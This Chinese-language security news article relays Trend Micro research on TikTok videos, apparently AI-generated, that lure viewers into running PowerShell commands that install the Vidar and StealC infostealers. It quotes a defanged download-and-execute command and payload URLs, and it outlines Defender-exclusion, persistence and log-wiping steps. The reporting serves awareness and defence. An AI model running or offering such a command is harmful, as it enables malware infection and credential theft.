趨勢(shì)科技（Trend Micro）最新研究揭露，TikTok平臺(tái)正出現(xiàn)一種新型威脅：AI生成的視頻誘騙用戶執(zhí)行惡意PowerShell命令，使其暴露在強(qiáng)大的信息竊取惡意軟件風(fēng)險(xiǎn)之下。

導(dǎo)致Vidar和StealC惡意軟件的感染鏈條 | 圖片來(lái)源：Trend Micro

社交工程攻擊新手法

趨勢(shì)科技近期曝光了一起危險(xiǎn)的社交工程攻擊活動(dòng)，黑客利用TikTok的病毒式傳播平臺(tái)分發(fā)Vidar和StealC——兩種復(fù)雜的信息竊取惡意軟件家族。網(wǎng)絡(luò)犯罪分子通過(guò)AI生成內(nèi)容和利用用戶信任，將看似無(wú)害的視頻教程轉(zhuǎn)變?yōu)閻阂廛浖鞑ポd體。

報(bào)告指出："這類攻擊使用視頻（可能由AI生成）誘導(dǎo)用戶執(zhí)行PowerShell命令，這些命令被偽裝成軟件激活步驟。"

攻擊傳播機(jī)制

攻擊始于@gitallowed、@zane.houghton和@sysglow.wow等TikTok賬號(hào)分享的匿名教程視頻，指導(dǎo)觀眾激活Windows、Spotify或CapCut等軟件。部分視頻播放量超過(guò)50萬(wàn)次，展示的"激活"步驟最終會(huì)引導(dǎo)用戶執(zhí)行如下PowerShell命令：

iex (irm hxxps://allaivo[.]me/spotify)

趨勢(shì)科技強(qiáng)調(diào)："視頻指示觀眾運(yùn)行一系列命令...指導(dǎo)語(yǔ)音也疑似AI生成，進(jìn)一步表明攻擊者使用AI工具制作這些視頻。"

該命令會(huì)下載并執(zhí)行遠(yuǎn)程腳本，啟動(dòng)一個(gè)兼具隱蔽性和持久性的惡意軟件投放鏈。

攻擊流程詳解

• 用戶觀看TikTok視頻后直接執(zhí)行PowerShell命令
• 從hxxps://allaivo[.]me/spotify下載并運(yùn)行遠(yuǎn)程腳本
• 在APPDATA和LOCALAPPDATA創(chuàng)建隱藏目錄，并添加到Windows Defender排除列表
• 下載二級(jí)有效載荷——通常是從hxxps://amssh[.]co/file.exe獲取的Vidar或StealC
• 從hxxps://amssh[.]co/script.ps1獲取最終持久化腳本，使惡意軟件能在系統(tǒng)重啟后繼續(xù)運(yùn)行
• 刪除日志和臨時(shí)文件夾以掩蓋取證證據(jù)

趨勢(shì)科技警告稱："腳本采用重試邏輯確保有效載荷成功下載，然后以隱藏的提升權(quán)限進(jìn)程啟動(dòng)惡意軟件可執(zhí)行文件。"

新型C&C通信技術(shù)

惡意軟件激活后，會(huì)使用新型規(guī)避技術(shù)與命令控制（C&C）服務(wù)器通信：

• Vidar利用Steam和Telegram等平臺(tái)作為Dead Drop Resolvers（DDR，死投解析器），將真實(shí)服務(wù)器地址隱藏在個(gè)人資料元數(shù)據(jù)中
• StealC直接連接基于IP的終端（如91[.]92[.]46[.]70）

研究人員指出："Vidar尤其濫用Steam和Telegram等合法服務(wù)作為死投解析器。"

AI驅(qū)動(dòng)的惡意軟件新時(shí)代

TikTok算法放大效應(yīng)與AI生成欺騙手段的結(jié)合，標(biāo)志著惡意軟件傳播進(jìn)入新時(shí)代。正如趨勢(shì)科技強(qiáng)調(diào)："AI生成內(nèi)容的使用，使這類攻擊從孤立事件升級(jí)為高度可擴(kuò)展的運(yùn)營(yíng)活動(dòng)。"